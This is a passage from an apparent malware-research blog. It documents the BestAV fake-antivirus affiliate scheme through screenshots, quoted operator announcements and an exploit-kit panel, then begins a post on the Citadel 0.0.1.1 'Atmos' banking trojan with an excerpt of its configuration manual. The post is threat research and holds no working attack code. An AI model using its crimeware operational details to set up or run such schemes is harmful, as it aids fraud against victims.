href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjV9zj7rJGz7okNtYouyKNI9TQm3cBdXpch_ojM_lR8JBjA2DLVKlKa2LdOhrwlfT7BsxCSZ5VBMvFYJRxPSG0Oi0DIYL5RWDHr-zwPXvNIkA3gDDYQsKSwSYliIfrMDkMge_zLHDCIlG8/s1600/09-04-2014+14-08-59.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjV9zj7rJGz7okNtYouyKNI9TQm3cBdXpch_ojM_lR8JBjA2DLVKlKa2LdOhrwlfT7BsxCSZ5VBMvFYJRxPSG0Oi0DIYL5RWDHr-zwPXvNIkA3gDDYQsKSwSYliIfrMDkMge_zLHDCIlG8/w400-h185/09-04-2014+14-08-59.png" width="400" /></a></div> <br /> Tickets:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWVr5WjTtPaL4zg47rhLKyhgg-iQ8DzeAXqSslvvhZDcsEH7FkVDQVR2JZJ_Zn-4eQrLJakhM1PyF2KHdWYN1z0tc_IaBbP0DweZx2BJiVuQfm2w3GV43jghVZozHU2VhZnQ7AbOGYbj4/s1600/11-04-2014+18-51-29.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="123" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWVr5WjTtPaL4zg47rhLKyhgg-iQ8DzeAXqSslvvhZDcsEH7FkVDQVR2JZJ_Zn-4eQrLJakhM1PyF2KHdWYN1z0tc_IaBbP0DweZx2BJiVuQfm2w3GV43jghVZozHU2VhZnQ7AbOGYbj4/s1600/11-04-2014+18-51-29.png" width="400" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihnzyySCnz09W_96AMW5BF66sEzDesk8rVsokmJmx1lRjx_rf7nDvTB4YAJExyVpX31UJv9Y-fv71Rhm5E2pjtFzClnCRwtCbQ4sS6n87HXU7RNJydwHo-OcNpZTHkE8sIRtntlbLHrWs/s1600/11-04-2014+18-49-00.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="221" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihnzyySCnz09W_96AMW5BF66sEzDesk8rVsokmJmx1lRjx_rf7nDvTB4YAJExyVpX31UJv9Y-fv71Rhm5E2pjtFzClnCRwtCbQ4sS6n87HXU7RNJydwHo-OcNpZTHkE8sIRtntlbLHrWs/s1600/11-04-2014+18-49-00.png" width="400" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> &nbsp;<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKGWwT7BzAYGvhOs3QW4xuFimKKI06jLAtSPV9Jr9f1WMa4kWIbxvwXD7XZLTh0JoSrq1Gk9T_L5PwyfM8NsIflyKrTbph1KoEVlEp9vBGymCkh_q3L2TWrplcwTgIQT_kvHLue7ehw-U/s1600/2014-07-08_14-59-24.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKGWwT7BzAYGvhOs3QW4xuFimKKI06jLAtSPV9Jr9f1WMa4kWIbxvwXD7XZLTh0JoSrq1Gk9T_L5PwyfM8NsIflyKrTbph1KoEVlEp9vBGymCkh_q3L2TWrplcwTgIQT_kvHLue7ehw-U/s1600/2014-07-08_14-59-24.png" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhJDSNEb7HNP9LdJ7mbSD5c7vG6vMWyIo4uSK2IqB_kvxQe86We-w3lwDsSKYQOUYi0_ehYC_PJ0JZanoyEKuNoTy_tY1usGvsEhQtu7jLojGmy6Ns-9lm855Q0rhcz9KvBG7VIxpicuI/s1600/2014-07-08_15-00-24.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="339" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhJDSNEb7HNP9LdJ7mbSD5c7vG6vMWyIo4uSK2IqB_kvxQe86We-w3lwDsSKYQOUYi0_ehYC_PJ0JZanoyEKuNoTy_tY1usGvsEhQtu7jLojGmy6Ns-9lm855Q0rhcz9KvBG7VIxpicuI/w400-h339/2014-07-08_15-00-24.png" width="400" /></a></div> <br /> BestAV later changed their urls to farotexsoft.com, webalizer was leaking informations:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvgsMco9q_rf8eRAnvPiaUmsY1p729Wn-UDIsUqFSGg42TUbN9PlbwDjRqNVCcqvQQ38LeWBhyx0xfV2knn0nFogG44QZzylhu0prJ0_GtBRUNmsDCN_0TovPJK5st_xHhv_qMba6i8LA/s1600/2014-07-08_00-41-29.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvgsMco9q_rf8eRAnvPiaUmsY1p729Wn-UDIsUqFSGg42TUbN9PlbwDjRqNVCcqvQQ38LeWBhyx0xfV2knn0nFogG44QZzylhu0prJ0_GtBRUNmsDCN_0TovPJK5st_xHhv_qMba6i8LA/s1600/2014-07-08_00-41-29.png" width="313" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwGaQL2W0gShW_TQR0RKgl2dlww15EBv1D-K2w4bzecJCOwPjijYpLrKXr9x6Gu42MQJ6875x22B16Hbo0ExmHBxip8U8fH4pFu7ky3cH04j9tBEUBaPQdXjoKZoKRXc89-YLHnDLFTUU/s1600/2014-07-08_00-43-03.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwGaQL2W0gShW_TQR0RKgl2dlww15EBv1D-K2w4bzecJCOwPjijYpLrKXr9x6Gu42MQJ6875x22B16Hbo0ExmHBxip8U8fH4pFu7ky3cH04j9tBEUBaPQdXjoKZoKRXc89-YLHnDLFTUU/s1600/2014-07-08_00-43-03.png" width="307" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_JmYMTEO4oD-mKXs-WT9pvC3yiVtCPTauOIiTfrfZAlyA-S8RB3p1t9BFTf48HQPUdxzRNyK_HRCrzfvVwzfXCNdW6Nnil9lHpKogLrFsrs_kCvBM6aXw_FVgHZv1iPUQ389rnRIy7VI/s1600/2014-07-08_00-48-43.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_JmYMTEO4oD-mKXs-WT9pvC3yiVtCPTauOIiTfrfZAlyA-S8RB3p1t9BFTf48HQPUdxzRNyK_HRCrzfvVwzfXCNdW6Nnil9lHpKogLrFsrs_kCvBM6aXw_FVgHZv1iPUQ389rnRIy7VI/s1600/2014-07-08_00-48-43.png" width="307" /></a></div> <br /> Interesting referrers:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRLTi2Fn908x8J_zZM4ccz8JAyzbrlMFkG3RwniGcfGugzmTwvtQEf5oSJhNIXN_FnpxiBIwMVlnTZ2EqLpCPWBDYaK9HAeh4UuKoJl7NfoH8MeXXtI7ds9nfxjSqfjd1VBIzjUa2uMlk/s1600/2014-07-08_00-44-03.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRLTi2Fn908x8J_zZM4ccz8JAyzbrlMFkG3RwniGcfGugzmTwvtQEf5oSJhNIXN_FnpxiBIwMVlnTZ2EqLpCPWBDYaK9HAeh4UuKoJl7NfoH8MeXXtI7ds9nfxjSqfjd1VBIzjUa2uMlk/s1600/2014-07-08_00-44-03.png" width="307" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixkrNiHjfLeNMhudXkxjseUOui2K9XSmSSDMGg0_hX7S8MQRpQUCCiwUwK7n87cTuYH4bhen4HICBl0ZsTsOnpxFD8q7aa54b3taWpAPtn_ela1wYcWcFITevRPIRLUaMToutSzm8SDQ0/s1600/2014-07-08_00-50-07.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixkrNiHjfLeNMhudXkxjseUOui2K9XSmSSDMGg0_hX7S8MQRpQUCCiwUwK7n87cTuYH4bhen4HICBl0ZsTsOnpxFD8q7aa54b3taWpAPtn_ela1wYcWcFITevRPIRLUaMToutSzm8SDQ0/s1600/2014-07-08_00-50-07.png" width="307" /></a></div> <br /> Prime affiliate who are in relation with the group behind BestAV:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLGtRh-2hJz0ac4mTxvuIBZHR-ux6ea009uWVYMBndGNp6AhKzIRp160_ocAzNy6cqId-019oILDVfHE8UMvwJ-tNSI2_njvH2sJTxfP4vRMY0jFtE6A4dkO_KlHafQNT-k_sG7N-f46Y/s1600/2014-07-08_01-10-57.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLGtRh-2hJz0ac4mTxvuIBZHR-ux6ea009uWVYMBndGNp6AhKzIRp160_ocAzNy6cqId-019oILDVfHE8UMvwJ-tNSI2_njvH2sJTxfP4vRMY0jFtE6A4dkO_KlHafQNT-k_sG7N-f46Y/s1600/2014-07-08_01-10-57.png" width="355" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpXaxaNc_Uy4Njchls2RyyI-M4z3zQbK791U_r28xxMkDjRtvnpaDlgRQTFdYRJDvIlKjiC-ZP3vbk23G-D4X2nhg3tDiK6HpzrowPYbCcBcberdSWXAQ5C2_IvCpQhLPAJviE-r1Jg-M/s1600/2014-07-08_01-21-58.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="293" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpXaxaNc_Uy4Njchls2RyyI-M4z3zQbK791U_r28xxMkDjRtvnpaDlgRQTFdYRJDvIlKjiC-ZP3vbk23G-D4X2nhg3tDiK6HpzrowPYbCcBcberdSWXAQ5C2_IvCpQhLPAJviE-r1Jg-M/s1600/2014-07-08_01-21-58.png" width="400" /></a></div> <br /> BestAV old affiliate Exploit kit:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-QvG31oowyVlz86y_Diawt813crfbk4fXZBucCdOCelFbjFs8QkHWPtijM71sPnK0jUhNs8v0ZcubE3iWxuxOPW0JxI3V52zuoKEGNzN22-RjkbAuJHk0Ts7h6QRmSJmZd5HbuVYNcTs/s1600/IGNCHX1sbhM6el45D0HcPcuM1a0k1Hf8uccCBsKfGm2cD.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-QvG31oowyVlz86y_Diawt813crfbk4fXZBucCdOCelFbjFs8QkHWPtijM71sPnK0jUhNs8v0ZcubE3iWxuxOPW0JxI3V52zuoKEGNzN22-RjkbAuJHk0Ts7h6QRmSJmZd5HbuVYNcTs/s400/IGNCHX1sbhM6el45D0HcPcuM1a0k1Hf8uccCBsKfGm2cD.png" width="370" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTbUH1MUlQYdRVuTmCsB2pRIudYQ08n1eXQU8Y6mRKFGiMZwdF_Nc12FXv6ZPyhKwKLzZYCD3gsA1L4L8Zz_iRoOWewIdKPcNOqozJrUejlaLXbtShkUAUa4RM2YQWffJhozVJCHIBXcQ/s1600/1XPeZxCDILVEmHK7daHZm2v3ZzM0x2Spvxy0XG8Uf.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTbUH1MUlQYdRVuTmCsB2pRIudYQ08n1eXQU8Y6mRKFGiMZwdF_Nc12FXv6ZPyhKwKLzZYCD3gsA1L4L8Zz_iRoOWewIdKPcNOqozJrUejlaLXbtShkUAUa4RM2YQWffJhozVJCHIBXcQ/s400/1XPeZxCDILVEmHK7daHZm2v3ZzM0x2Spvxy0XG8Uf.png" width="370" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQI3UWb_RufZdckQhVOSEhhpdOiqZVio8tHXyl_KWFnvxD_Yf2fm9znNdZHZcxESViHpB6TemYlrf87LP4TvCSN-N_KCCrAi4l3kGgBYvHDe1PlqqlIH5j2wpNJitVCEEGyHTN7C0F3Ek/s1600/04-08-2013+16-11-03.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQI3UWb_RufZdckQhVOSEhhpdOiqZVio8tHXyl_KWFnvxD_Yf2fm9znNdZHZcxESViHpB6TemYlrf87LP4TvCSN-N_KCCrAi4l3kGgBYvHDe1PlqqlIH5j2wpNJitVCEEGyHTN7C0F3Ek/s400/04-08-2013+16-11-03.png" width="370" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBl1eFteAOM1WKcoJXAKkuenRIWHXp8PELKdKHT_BQDBUDrc3fu-9gZqUcjdACaZVNb_iP4wf9-J7lcPc5bxTPlzpL6mNQrprLk9rZbzVWcF3sKO2WFDKPV3Mo-rHaIv4G2QD0PMiH9UQ/s1600/fiMlBYDxJSasiDsXSgoGhv7aP0B36c3mmUdEFMX.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBl1eFteAOM1WKcoJXAKkuenRIWHXp8PELKdKHT_BQDBUDrc3fu-9gZqUcjdACaZVNb_iP4wf9-J7lcPc5bxTPlzpL6mNQrprLk9rZbzVWcF3sKO2WFDKPV3Mo-rHaIv4G2QD0PMiH9UQ/s400/fiMlBYDxJSasiDsXSgoGhv7aP0B36c3mmUdEFMX.png" width="370" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgh7yH0CCXT3bN3QxJQ7tOKZMr3BjtPk5NfxjsXpfQqLxS_UyHCsUmp5sSuXMWt31ZS-b7uhjnYcZSvwfqpXG8mA-vtlSM-1M-F9456GZEvPq6WngXF4ljEFqp821FXsMoFB-MYWpjEfWY/s1600/G7TabxhycRsgHHl6CY6K0ar21VVm.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgh7yH0CCXT3bN3QxJQ7tOKZMr3BjtPk5NfxjsXpfQqLxS_UyHCsUmp5sSuXMWt31ZS-b7uhjnYcZSvwfqpXG8mA-vtlSM-1M-F9456GZEvPq6WngXF4ljEFqp821FXsMoFB-MYWpjEfWY/s400/G7TabxhycRsgHHl6CY6K0ar21VVm.png" width="370" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXAGZ7ORAZFSZ6BD-rwoRUzI-i7sa8-FlcOz4F2M-qBOSMKWMjk7uGhOwGn7KayRDFtLHjbNHhMVOw6QoA-gSDdXhwCekd7hGHGxEWO3wSmu6O1JYqWiHVsEAOPEGikcHD-Bw5mC95o3M/s1600/Na2pOYmLVA4FXo1XBOYPdZKaxpP2SXEAyPju.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXAGZ7ORAZFSZ6BD-rwoRUzI-i7sa8-FlcOz4F2M-qBOSMKWMjk7uGhOwGn7KayRDFtLHjbNHhMVOw6QoA-gSDdXhwCekd7hGHGxEWO3wSmu6O1JYqWiHVsEAOPEGikcHD-Bw5mC95o3M/s400/Na2pOYmLVA4FXo1XBOYPdZKaxpP2SXEAyPju.png" width="370" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgftlMtgmLYEPePXQhr1Vif66kVdRTtiB_t7Ko5J29aWLxm_pzoFmr2nDtzec0bwWaa6oduCR9NEJBQsXPP3w9zcVxYcl6BPauESixVh6s_F2hmrFP44o4fWWCvJxT_q_rjIdbMUh8WOG4/s1600/04-08-2013+16-15-55.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgftlMtgmLYEPePXQhr1Vif66kVdRTtiB_t7Ko5J29aWLxm_pzoFmr2nDtzec0bwWaa6oduCR9NEJBQsXPP3w9zcVxYcl6BPauESixVh6s_F2hmrFP44o4fWWCvJxT_q_rjIdbMUh8WOG4/s400/04-08-2013+16-15-55.png" width="370" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-fJMQSUHlfLv9xhnqJzdOHGwITXeXrcVmgnR-GVM97zzxwwQWVVSNJYJ7jI4t7j-Hj2BiMj_KqhkfvAXGNbD9hv-X6D25CuHfRH8vuLu7IDQLfuqsREoEz1OexbXVig0BbOmL6Q5j6tk/s1600/nG3Yss0PZVlSRuDJ9RoC.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-fJMQSUHlfLv9xhnqJzdOHGwITXeXrcVmgnR-GVM97zzxwwQWVVSNJYJ7jI4t7j-Hj2BiMj_KqhkfvAXGNbD9hv-X6D25CuHfRH8vuLu7IDQLfuqsREoEz1OexbXVig0BbOmL6Q5j6tk/s400/nG3Yss0PZVlSRuDJ9RoC.png" width="370" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSD6ERQxWrKGFdQgS50jnIWWbwnZdNA6JWmD9KyyxoXcCqPC_F5ExBW7x__aJMbg4eCSXGAKfINH6gc2dgx7mb-yD5rAAP4u-jC0y-cu9YGLMnJ3VXgLnksSt5L_K9WqxvwsSIShO6u6s/s1600/5hb3k4deZM5BvMM1PY9H6Y6pPUoDu3YEdecx6lYciVa.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSD6ERQxWrKGFdQgS50jnIWWbwnZdNA6JWmD9KyyxoXcCqPC_F5ExBW7x__aJMbg4eCSXGAKfINH6gc2dgx7mb-yD5rAAP4u-jC0y-cu9YGLMnJ3VXgLnksSt5L_K9WqxvwsSIShO6u6s/s400/5hb3k4deZM5BvMM1PY9H6Y6pPUoDu3YEdecx6lYciVa.png" width="370" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpk2-IMpUFTxaaC3ZAHcFboKmJ4ng4K3NBGI56fznQMwAwa2CO9my4WoiG0avomvpDdFLX7i13esh50ZCsmoYR_5ALfqROrDJyiglY0ujlEUcyT9yQG3EhZ-8BJCl5hMSA6RtayiuIOMQ/s1600/7RF4cyMueistmhehGBJV68EiXcy.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpk2-IMpUFTxaaC3ZAHcFboKmJ4ng4K3NBGI56fznQMwAwa2CO9my4WoiG0avomvpDdFLX7i13esh50ZCsmoYR_5ALfqROrDJyiglY0ujlEUcyT9yQG3EhZ-8BJCl5hMSA6RtayiuIOMQ/s400/7RF4cyMueistmhehGBJV68EiXcy.png" width="370" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJjBbw0SJN1lJnW-VRbcu-cHMdv1VFZtbnOGHCVI-GHhVhh96gt5oujnCPVM5h4axicqonauohIDvRP0Qj4BwqrsKhiuwaVl8AUFTiPROaFkq6dNUShdjYT8mVwtv-6nh7DeduQx7iF4U/s1600/FEK8RF0a8i7OIY89BON6IPBJUtJLx25nMxmgvAsCg.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJjBbw0SJN1lJnW-VRbcu-cHMdv1VFZtbnOGHCVI-GHhVhh96gt5oujnCPVM5h4axicqonauohIDvRP0Qj4BwqrsKhiuwaVl8AUFTiPROaFkq6dNUShdjYT8mVwtv-6nh7DeduQx7iF4U/s400/FEK8RF0a8i7OIY89BON6IPBJUtJLx25nMxmgvAsCg.png" width="370" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8QS7YSWdghVEZxjQwT2BzVi-sLb0kVxGGTfZiCAGGvVRBE9zJYtqZ9Pq7ZBFGqz6iKl8JkKphX1o6_nL1bDdTJe4xi8ibB2wFRSDzgE2lVrmIokaWUFki8ebdXym4jKI2FV1DOvIt6lg/s1600/PsPe4aAXGhp9coIKLMpIRVf.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8QS7YSWdghVEZxjQwT2BzVi-sLb0kVxGGTfZiCAGGvVRBE9zJYtqZ9Pq7ZBFGqz6iKl8JkKphX1o6_nL1bDdTJe4xi8ibB2wFRSDzgE2lVrmIokaWUFki8ebdXym4jKI2FV1DOvIt6lg/s400/PsPe4aAXGhp9coIKLMpIRVf.png" width="370" /></a></div> EK test:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyJZABqFWbDsgTMqliqB6CsgehCuhPbL86aac7UDqDDyIN3Bxm3Vjn6OpxY-2M5vQvGAZcBRAfKueVm4_O9VdbQR3yqimFRXsC5bwpYRn_ZAj5R0Mhp8czVRPsNMcJOB99-jP-Z6QYK4o/s1600/u7nPKFcV19FC2ZKPjEk8cg6f.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyJZABqFWbDsgTMqliqB6CsgehCuhPbL86aac7UDqDDyIN3Bxm3Vjn6OpxY-2M5vQvGAZcBRAfKueVm4_O9VdbQR3yqimFRXsC5bwpYRn_ZAj5R0Mhp8czVRPsNMcJOB99-jP-Z6QYK4o/s400/u7nPKFcV19FC2ZKPjEk8cg6f.png" width="370" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> </div> Exploit Kit in action:<br /><a href="https://odysee.com/@XyliboxFranceVXCVE:3/sibhost-exploit-kit:e">https://odysee.com/@XyliboxFranceVXCVE:3/sibhost-exploit-kit:e</a><br /><br />BestAV was doing nothing since the end of 2013 and got back to work in end of jully 2014:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5eyw1hnW8PupOn133kAnJqlrLbKt2J62Bb7XBREnTmkc-VXG3TPh4YaLp_7Woac69pmZR-GbsuabKpIKteafLo6EJDRd-a-DVla4Xs2TH1qINrEPCWYFRblU0WclSVfot7VO1Q0XImd0/s1600/2014-07-30_13-10-16.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="340" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5eyw1hnW8PupOn133kAnJqlrLbKt2J62Bb7XBREnTmkc-VXG3TPh4YaLp_7Woac69pmZR-GbsuabKpIKteafLo6EJDRd-a-DVla4Xs2TH1qINrEPCWYFRblU0WclSVfot7VO1Q0XImd0/s1600/2014-07-30_13-10-16.png" width="400" /></a></div> <br /> 19:42 29.07.2014 Перезагрузка. Reload. 3 2 1, Go go go!<br /> Colleagues, we’ve restarted our services and looking forward to work!<br /> ---<br /> 15:53 27.03.2014 инсталлы починили<br /> Installs are fixed now. Everything is fixed.<br /> ---<br /> 10:02 27.03.2014 Installs Update 2.<br /> Setting up new callback server. Promised to be ready by tonight. Once more – payforms and sales are going through, there is no problem there<br /> ---<br /> 05:33 27.03.2014 Инсталлы<br /> Callback proxy is broken. Fixing.<br /> Payforms are working, sales are going through.<br /> No reason to be worried.<br /> ---<br /> 21:02 04.03.2014 Payments.<br /> Hello everyone, about the payments.<br /> The situation is the next.. to unfreeze merchants I need 30-40 AV sales a day..<br /> not so much, right? But due to some adverts stopped working after the New Year and some others experienced some problems and also stopped working there is almost no sales happening.<br /> Huge regards to all the webmasters who support me in this difficult time!<br /> I’m trying to bring the sales to the required level (buying traffic, etc.).<br /> If my calculations are correct and no other surprises I’ll be at the required level next week and start pushing payments through, but would like to give you a warning in advance that the first ones to receive the payments will be the webmasters who have most of the sales – thanks to them we’re still operating.<br /> <br /> <div class="separator" style="clear: both; text-align: center;"> </div><p>The last RAW sample we saw before the final shutdown of the program: <a href="https://www.virustotal.com/en/file/988c4604de2aec510c2d3242895b24c988bb115069c3834d47552fe7c2b86370/analysis/">https://www.virustotal.com/en/file/988c4604de2aec510c2d3242895b24c988bb115069c3834d47552fe7c2b86370/analysis/</a><br /> <br />&nbsp;</p><p>Voilà, so long, and thanks for all the fish !</p><p>This blog will be kept online (but inactive) for the numerous records about the malware scene of 2010-2016 era.<br />Thank you everyone and see you in night city.</p><p><br />--<br />Xyl<br /><br /></p>https://www.xylibox.com/2020/01/bestav-fake-antispyware-affiliate.htmlnoreply@blogger.com (Steven K)4tag:blogger.com,1999:blog-5365964245877416061.post-4932280966856220402Fri, 19 Feb 2016 13:26:00 +00002016-08-14T15:59:02.073+02:00AtmosCanadaCitadelCitadel 0.0.1.1Citadel 101Holy shit a new post!IframerNeuromodelSpamTokenSpyUSAWebinjectZeuSАтмосузевсзевсаподобного<br /> Guys of JPCERT, 有難う御座います！<br /> Released an update to their <a href="http://blog.jpcert.or.jp/2016/02/banking-trojan--27d6.html">Citadel decrypter</a> to make it compatible with 0.0.1.1 sample.<br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW6j4DT0jaXWIumHfBh0MMaHaTvkoV1OvFAAsBF7zmsoycRMH5gKQJoVKPUFziBfDWSKjNhtyMGEKEmMl_xt3exbWl_ehK7JXesMKoxGWwR-BZln34gpHpiFXHwQJuz8afdgxorYmFdMQ/s1600/2016-02-18_17-29-30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW6j4DT0jaXWIumHfBh0MMaHaTvkoV1OvFAAsBF7zmsoycRMH5gKQJoVKPUFziBfDWSKjNhtyMGEKEmMl_xt3exbWl_ehK7JXesMKoxGWwR-BZln34gpHpiFXHwQJuz8afdgxorYmFdMQ/s400/2016-02-18_17-29-30.png" width="400" /></a></div> <br /> Citadel 0.0.1.1 don't have a lot of documentation, so time as come to talk about it.<br /> Personally i know this malware under the name 'Atmos' (be ready for name war in 3,2,1...)<br /> &nbsp; <br /> The first sample i was aware is the one spotted by tilldenis <a href="http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;t=1465&amp;start=170#p26519">here</a> in jully 2015.<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC1BcTDIPNImn2eT3IX2yBDdFjRnWztRLasCBmv5dTDf_Ro_zJlE6KVMpwdKzqi3Iag-ytlwXwoVN-1E3yKfoCus2mZCsj-5cooICh_ORLQ8OPK4y46Nop9EqF3WdWbem5d_itJROuojA/s1600/2015-11-03_23-40-28.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC1BcTDIPNImn2eT3IX2yBDdFjRnWztRLasCBmv5dTDf_Ro_zJlE6KVMpwdKzqi3Iag-ytlwXwoVN-1E3yKfoCus2mZCsj-5cooICh_ORLQ8OPK4y46Nop9EqF3WdWbem5d_itJROuojA/s400/2015-11-03_23-40-28.png" width="400" /></a></div> <br /> I re-observed this campaign in november 2015 with the same 'usca'.<br /> You can find a technical description of the product here: <a href="http://pastebin.com/raw/cAqbrqAS">http://pastebin.com/raw/cAqbrqAS</a><a href="http://pastebin.com/raw.php?i=zuWeUtcu"></a><br /> <br /> Here is a small part translated to English related to configuration and commands:<br /> <div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"> 3. Configuration<br /> <br /> <span style="color: black;"><u><b>url_config1-10</b></u></span> [up to 10 links to configuration files; 1 main for your web admin panel and 9 spare ones. To save the resources, use InterGate button in the builder to place config files on different links without setting up admin panel. Spare configs will be requested if the main one is not available during first EXE launch. Don't forget to put EXE and config files in 'files/' folder]<br /> <u><b><span style="color: black;">timer_config 4 9</span></b></u> [Config file refresh timer in minutes | Retry interval]<br /> <span style="color: black;"><b><u>timer_logs 3 6</u></b></span> [Logs upload timer in 